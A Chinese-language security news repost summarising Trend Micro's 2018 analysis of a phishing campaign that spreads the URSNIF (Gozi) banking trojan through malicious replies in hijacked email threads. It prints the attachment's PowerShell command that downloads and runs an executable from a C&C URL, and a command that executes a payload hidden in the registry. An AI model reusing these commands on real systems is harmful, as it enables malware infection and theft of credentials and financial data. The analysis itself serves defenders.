<dl id="wqg5j"></dl>

    1. <menuitem id="wqg5j"></menuitem>

      <dl id="wqg5j"><font id="wqg5j"></font></dl>
    2. <dl id="wqg5j"><ins id="wqg5j"></ins></dl>
    3. <dl id="wqg5j"><ins id="wqg5j"><thead id="wqg5j"></thead></ins></dl>
      <li id="wqg5j"><ins id="wqg5j"></ins></li>
      安基網 首頁 資訊 安全報 查看內容

      網絡釣魚新手段:通過回復電子郵件來傳播URSNIF銀行木馬

      2018-10-11 12:41| 投稿: lofor |來自: 互聯網


      免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

      摘要: 來自網絡安全公司趨勢科技(Trend Micro)的Erika Mendoza、Anjali Patil和Jay Yaneza在本周二通過一篇博文向我們介紹了一種新的網絡釣魚手段,而攻擊者的最終目的是向受害者傳播知名的銀行木馬URSNIF(也被稱為Gozi ...

      來自網絡安全公司趨勢科技(Trend Micro)的Erika Mendoza、Anjali Patil和Jay Yaneza在本周二通過一篇博文向我們介紹了一種新的網絡釣魚手段,而攻擊者的最終目的是向受害者傳播知名的銀行木馬URSNIF(也被稱為Gozi,最早出現于2007年,并一直活躍于金融行業)。

      根據這篇博文的描述,大多數網絡釣魚活動在本質上都很簡單,并且很容易被發現——通常涉及到發送看似合法的電子郵件,并在文本中嵌入惡意附件或鏈接。但是,趨勢科技在9月份觀察到的垃圾電子郵件活動表明,攻擊者正傾向于另一種更復雜的網絡釣魚形式。

      在這起活動中,攻擊者并沒有利用虛假的電子郵箱賬戶來新建并發送電子郵件。相反,他們使用了被劫持的賬戶,并將惡意軟件放在了對原始電子郵件的回復中。由于這些電子郵件原本是合法的,而消息只是作為了持續會話的一部分,因此這種特殊的手段往往十分棘手和難以察覺。

      從趨勢科技目前收集到的所有數據來看,這場活動主要集中在北美和歐洲,僅有少數波及到亞洲和拉丁美洲。另外,這場活動主要針對的是與教育、金融和能源相關的機構,但也涉及到其他一些行業和機構,包括房地產、交通、制造業和政府。

      分析釣魚電子郵件樣本

      為了便于大家理解,我們在這里將展示由趨勢科技提供的一個釣魚電子郵件樣本,如下圖所示:

      圖1.用于回復會話的惡意電子郵件樣本

      由于電子郵件的發件人是收件人所熟悉的人,并且消息也是會話的一部分,因此收件人很容易相信這只是對原電子郵件的一個回復。此外,主題和語法似乎都是正確的,并且在電子郵件的末尾甚至還有簽名。

      然而,如果仔細檢查就會發現電子郵件中存在一些可疑的地方。其中,最明顯的差異是語言從法語到英語的變化。此外,惡意電子郵件中的簽名與合法電子郵件中的簽名是不同的。最后,回復是通用的,這就導致它可能與主題毫無關聯。雖然這并不意味著電子郵件就是惡意的,但至少給了我們一個危險信號。最重要的是,這些細小的細節乍一看可能很難發現,特別是對于那些每天都會查閱大量電子郵件的人來說。

      圖2.惡意電子郵件與合法電子郵件之間的對比

      分析惡意軟件有效載荷

      如果收件人雙擊了電子郵件中的惡意.doc附件,那么它將調用PowerShell從命令和控制(C&C)服務器下載最新版本的URSNIF惡意軟件,然后執行下載的文件:

      powershell $VWc=new-object Net.WebClient;$wIt=’http: //t95dfesc2mo5jr. com/RTT/opanskot.php?l=targa2.tkn’.Split(‘@’);$jzK = ‘369’;$Aiz=$env:public+’\’+$jzK+’.exe’;foreach($fqd in $wIt){try{$VWc.DownloadFile($fqd, $Aiz);Invoke-Item $Aiz;break;}catch{}}

      這個文件將充當惡意軟件的主加載程序。在執行其例程之前,它將首先檢查操作系統版本。這是由于它只會在Microsoft操作系統上執行,尤其是Windows Vista及其后續版本。另一方面,它還會主動規避某些語言環境,如CN和RU。

      主加載程序管理整個執行過程,并將事件記錄在文本文件中:

      %User Temp%\{temp filename}.bin

      圖3.惡意軟件加載程序的日志

      主加載程序還將從C&C服務器下載其他模塊,并將它們保存在注冊表文件夾HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4中。

      下圖展示的是主加載程序創建的注冊表項和包含腳本和二進制文件的條目。

      圖4.注冊表項和包含腳本和二進制文件的條目

      請注意,雖然這些注冊表項和一些注冊表項名稱會因計算機不同而存在差異,但位置始終位于HKCU\Software\AppDataLow\Software\Microsoft\。

      在下載組件之后,主加載程序將執行存儲在comsxRes(此名稱可能不同)中的Powershell腳本。下面的命令行指令展示了如何調用注冊表中的十六進制值。

      exe /C powershell invoke-expression([System.Text.Encoding]::ASCII.GetString((get-itemproperty ‘HKCU:\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-7C9D-AB0E-15700F2219A4’).comsxRes

      圖5. comsxRes的十六進制值

      當此腳本加載存儲在注冊表中的嵌入式二進制文件時,無文件執行就開始了。在下圖中,趨勢科技用“–{hex-encoded binary}—”替換了二進制數據,以顯示整段代碼。腳本是采用base64編碼的,以下是解碼后的結果:

      圖6.存儲在注冊表中的嵌入式二進制文件的代碼

      它將在創建的注冊表項中搜索Client32或Client64,并將此代碼注入explorer.exe以建立持久性。注冊表中的其他條目在其后續例程中是必不可少的,因為這些條目稍后將在注入的惡意軟件代碼中引用。例如,“TorClient”條目用于惡意軟件通過TOR網絡與其C&C服務器通信。

      分析被竊取的信息

      最終的有效載荷是一個名為Client32或Client64的DLL文件,具體取決于主機的體系結構。有效載荷的主要目標是執行信息竊取,具體包括以下信息:

      • 系統信息
      • 已安裝的應用程序列表
      • 已安裝的驅動程序列表
      • 正在運行的進程列表
      • 網絡設備列表
      • 外部IP地址
      • 電子郵箱憑證(IMAP、POP3、SMTP)
      • Cookies
      • 證書

      此外,它還可以錄制屏幕(.AVI),以及通過webinjects竊取財務信息。

       

      本文由 黑客視界 綜合網絡整理,圖片源自網絡;轉載請注明“轉自黑客視界”,并附上鏈接。


      Tag標簽:

      小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!



      免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


      鮮花

      握手

      雷人

      路過

      雞蛋

      相關閱讀

      最新評論

       最新
      返回頂部
      玄机图
      <dl id="wqg5j"></dl>

        1. <menuitem id="wqg5j"></menuitem>

          <dl id="wqg5j"><font id="wqg5j"></font></dl>
        2. <dl id="wqg5j"><ins id="wqg5j"></ins></dl>
        3. <dl id="wqg5j"><ins id="wqg5j"><thead id="wqg5j"></thead></ins></dl>
          <li id="wqg5j"><ins id="wqg5j"></ins></li>
          <dl id="wqg5j"></dl>

            1. <menuitem id="wqg5j"></menuitem>

              <dl id="wqg5j"><font id="wqg5j"></font></dl>
            2. <dl id="wqg5j"><ins id="wqg5j"></ins></dl>
            3. <dl id="wqg5j"><ins id="wqg5j"><thead id="wqg5j"></thead></ins></dl>
              <li id="wqg5j"><ins id="wqg5j"></ins></li>